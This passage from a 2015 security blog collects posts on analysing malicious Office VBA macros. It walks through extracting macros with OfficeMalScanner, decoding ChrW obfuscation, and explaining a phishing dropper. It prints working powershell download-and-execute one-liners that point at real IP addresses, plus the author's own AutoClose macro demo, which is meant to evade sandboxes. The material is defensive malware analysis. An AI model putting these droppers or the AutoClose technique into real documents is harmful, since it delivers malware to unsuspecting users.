  ShellExecute 0, "open", maliciousFileLocation, "", vbNullString, vbNormalFocus
End Sub


Execute the file that you just downloaded and saved. Of course the goods are actually in that executable, so you'd want to download and analyze that file at some point as well.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Resume Phish with VBA Macro in Word

I pasted some details about a Phishing email that I saw containing a Resume in a Microsoft Word document. If users clicked on the word document it executed some malicious VBA scripts that attempted to download a file and infect the host workstation. What are the steps to determine all that?

First get a copy of the Word Document. If you have the email, great (skip to step 8). If you don't have the email but have a Wireshark packet capture, then try these steps ...

1.) Find the email SMTP traffic and right-click, Follow TCP Stream
2.) Save As RAW
3.) Open the file in Notepad++, it's probably Base 64 encoded (like the example below)


5.) Delete everything before and after so all you're left with is the Base 64 encoded document, then Select it all


6.) Select Plugins => MIME Tools => Base 64 decode


7.) Now be careful since you have an active word document. You wouldn't want to accidentally click it. That's why it's best to do this in a disposable non-connected Virtual Machine. I wouldn't even save it as Word yet, just save it as a TXT file for now.


8.) Now use the OfficeMalScanner that I blogged about using here, and run this command that extracts a binary version of the macro
.\OfficeMalScanner.exe .\MaliciousWordDocument.txt inflate


9.) Now use the OfficeMalScanner to run this command to extract the actual VBA script
.\OfficeMalScanner.exe .\vbaProject.bin info


10.) Open that output file (VBAPROJECT.BIN-Macros\ThisDocument) in Notepad++ and boom! You have the code. Time for analysis.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, March 31, 2015

Obfuscated Malicious VBA Macro

I recently blogged about attackers using the auto-close method in Microsoft Word VBA for attacks.

Today I pasted a sample of a malicious Microsoft Word document. If you review the VBA code you'll see that it's a bunch of random variables names, a bunch of calls to chrw, and one call to Shell.

chrw returns the character associated with the numeric character code.

Shell runs the command line code that is passed to it.

How does it work? First it creates a method called 'sdfsdfdsf' that is called when the Microsoft Word document gets closed.

Then it declares 6 variables ( GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip ) and in each variable it appends, 1 character at a time, the malicious shell script it wants to run.

As an example, the first 4 characters in GVhkjbjv are 'c', 'm', 'd', and a space.

ChrW(49.5 + 49.5) & ChrW(54.5 + 54.5) & ChrW(50 + 50) & ChrW(16 + 16)

How did I know that?
ChrW(49.5 + 49.5) = ChrW(99) = 99 on the Ascii Table is the letter 'c'
ChrW(54.5 + 54.5) = ChrW(109) = 109 on the Ascii Table is the letter 'm'
ChrW(50 + 50) = ChrW(100) = 100 on the Ascii Table is the letter 'd'
ChrW(16 + 16) = ChrW(32) = 32 on the Ascii Table is the letter ' '


So if you follow that process through to the end you find
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;

If you're lazy (like me) and don't want to figure that out 1 character at a time, there are probably tools to fix that. Or just open a new word document, copy this code in, but replace the malicious Shell line

IUGuyguisdf = Shell(JHGUgisdc, 0)

with a message box

MsgBox(JHGUgisdc)



Happy hunting.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, March 23, 2015

It's not safe to Close Word Documents

Threatpost recently told us that the Dridex Malware has been seen using the AutoClose method in VBA.

First: What is the AutoClose function? This is a function in VBA (Visual Basic for Applications) that allows you to write code that will execute when a Microsoft Office document (Word, Excel, Powerpoint, etc.) is closed. A good legit example might be to prompt a user before they close to see if they want to run the spell-checker.

Second: Why is using AutoClose different than previous forms of malicious VBA? Because some malware detection detonation tools probably open malware, may even wait a period of time for code to execute, and might even attempt to trick malware into fast forwarding in time ... but I'm not sure how many also experiment with closing the document. I think most tools so far wait a period of time, and if nothing happens, the sandbox is closed and disposed of (without actually closing the document). So if the malware doesn't run till document close, then many tools may miss it.

Third: I thought it'd be fun to see exactly what I'm talking about in action!

Let's forecast into the future quickly by showing you this harmless empty folder at c:\windows\temp\badstuff


Now let's start the magic. Here is my malicious, albeit harmless looking word document.


Let's say you got it in an email and you thought it was legit, so you opened it. You clicked the "Enable Content" (NOTE: This is not a good idea.) cause you were expecting something useful to show up. But instead you got nothing. The document did nothing. Looks pretty useless. (NOTE: Even if you were a malware reverse engineer, if you set up some monitoring or used some automated tool, you'd see that so far, the document has done nothing, no callouts, no file changes, no registry changes, nothing.)

Then if you're the user, you hit that harmless, never can hurt-you, easy to use Red X that closes the document.


You go on your merry way, thinking it was kinda stupid that you received that pointless empty word document.

Let's go back and look at that harmless empty folder c:\windows\temp\badstuff


OH SNAP! Where'd that come from?

Good thing I'm a good guy, and I'd never mean you any harm. But what if this word document wasn't from a nice guy. Looks like they somehow gained some very dangerous access to your computer. Can you trust anything on your PC anywhere? Probably not, better re-image and re-build it.

How did that happen? If you re-opened the word document and went to the Developer -> Visual Basic section under 'This Workbook', you'd see some code inside an 'AutoClose' function.


' Runs when the document is CLOSED rather than opened, which is the whole point of
' this post: a sandbox that opens the file, waits, and then discards the VM without
' ever closing the document never sees this code execute.
Sub AutoClose()
     ' Launches powershell.exe with the user profile skipped and the execution policy
     ' bypassed, and has it download this blog page to
     ' c:\windows\temp\badstuff\myfakemalware.txt -- a benign stand-in for a real payload.
     Shell ("powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html','c:\windows\temp\badstuff\myfakemalware.txt')")
End Sub


Code like above can be modified to do whatever the attacker wants. Something more malicious than what I did. The snippet above simply downloads a file to your c:\ drive from an internet site. Imagine if in addition there was a command added to execute that file. Uh-oh, now we're in trouble.

Please don't open unexpected files from people you weren't expecting to send them. Microsoft Office documents cannot be trusted.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, March 20, 2015

Extract a Macro from an Excel Doc

There are a few tools out there that extract Macros out of Microsoft Office Documents. I thought I'd walk through an example of how.

First let's create an excel document with a macro.

1.) First open Excel, select the Developer Tab, and the Visual Basic option


2.) Double-click in the VBA Project window on 'This workbook'


3.) Select the "Workbook" from the VBA code drop down list


4.) Write a Hello World type macro (Ex: MsgBox("Hello World") )


5.) Close out of the VBA code area


6.) Save the Excel doc as one of those old evil versions of Microsoft Office


Second let's extract the macro from the excel document without opening it

1.) Download one of the free Macro extraction software tools like OfficeMalScanner


2.) Run the extractor from the command line (Ex: OfficeMalScanner.exe C:\windows\temp\sample.xls info)


3.) See that it found something


4.) View the output folder


5.) Open the file 'ThisWorkbook' to see the macro code!




Now you're safe to analyze without opening and getting infected. Sweet.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, March 16, 2015

Talking Thru some Malware in a Microsoft Word VBA Macro

There was this phishy email

From: Forrest Chavez Carmella.7b@lepau.com
Subject: Outstanding invoices - 122680 January
Attachment: 122680.doc (MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f)


I posted a few more details here. Just by looking at the sender (somebody I never knew, a domain name I've never heard of) I shouldn't have opened it. The Subject is trying to play on my emotions and get me to be upset that I have an open invoice, but I should know better and realize it's just a trick and never open it. Also the attachment is terribly named with some ugly numbers which should make me cautious as well.

But anyways, let's say I'm stupid and opened this phish. I thought I'd walk through what this is attempting to do. Inside the word document there is a VBA script (Visual Basic for Applications). If you have Macros enabled or click run Macro, then you can become the victim.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;


  • 1.) First you'll see ...

    cmd /K powershell.exe -ExecutionPolicy bypass -noprofile XXXXXXXCODEXXXXXXXX

        A.) 'cmd' is your friend command prompt

        B.) '/K' is a parameter being sent to 'cmd' telling it to run the upcoming command and keep the prompt open after it finishes

        C.) 'powershell.exe' is the command to run, and Powershell is your IT administrator's powerful little scripting prompt that gives them the ability to do anything that the User Interface could do but in a scripted fashion.

        D.) '-ExecutionPolicy bypass' is utilized because in general Powershell protects users from malicious scripts, but there are parameters you can pass to 'powershell.exe' that give it a 1-time bypass of those security restrictions and allows something malicious like this to run.

        E.) '-noprofile' is utilized to also try to bypass any tools your company may have running. By default you have a user profile and some scripts that generally run when you open powershell that your company sets up to keep you safe, secure, and make sure all your apps work properly. Using '-noprofile' bypasses those scripts and says just run my 1 evil script without anything else running first.

        F.) Finally we get to the Code, I abbreviated as XXXXXXXCODEXXXXXXXX , but I have more detail below in #2

  • 2.) Second you'll see the Powershell script code that tries to download the payload

    (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab')

        A.) '(New-Object System.Net.WebClient)' is the equivalent, in a high level programming language, of declaring a new variable such as WebClient c = new WebClient(). You are basically creating a powerful object that will allow you to connect to the internet and perform operations.

        B.) '.DownloadFile(XXXURLXXX, XXXXLOCATIONXXXXX)' is a function you can call on that powerful WebClient object which makes the downloading and saving of a file as trivial as passing in the URL ( XXXURLXXX ) and the save location ( XXXXLOCATIONXXXXX ). The URL in this case ( hxxp://62.76.41.15/asalt/assa.exe ) contains the payload or the evil malware. This could be anything from a KeyLogger, to Ransomware, to anything under the sun. And it's saving it to '%TEMP%\JIOiodfhioIH.cab' , so the Windows Temp folder as a normal looking '.cab' file (generally used for things like Windows Updates, etc.).
  • 3.) Third you'll see a command script trying to extract the contents of the CAB file

    'expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;'

        A.) 'expand' is another windows command that gets run against 'cmd' that is able to extract the contents of a CAB file (CAB files are kinda like ZIP files)
  • 4.) Fourth and finally you'll see a command script trying to execute an EXE

    'start %TEMP%\JIOiodfhioIH.exe;'

        A.) 'start' is another windows command that gets run against an 'exe' that came out of the CAB file. If this command succeeds, then the malware has been run and you're likely infected.


So in summary 1.) Get a phishy email 2.) Open the Word Doc 3.) The malicious VBA Macro runs inside 4.) It uses powershell to download a CAB file 5.) It uses 'expand' to extract the malware from the CAB file 6.) It uses 'start' to run the malware.

Boom, you're infected! If you want to prevent this, a good start would be not opening such evilly suspicious looking emails :-)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.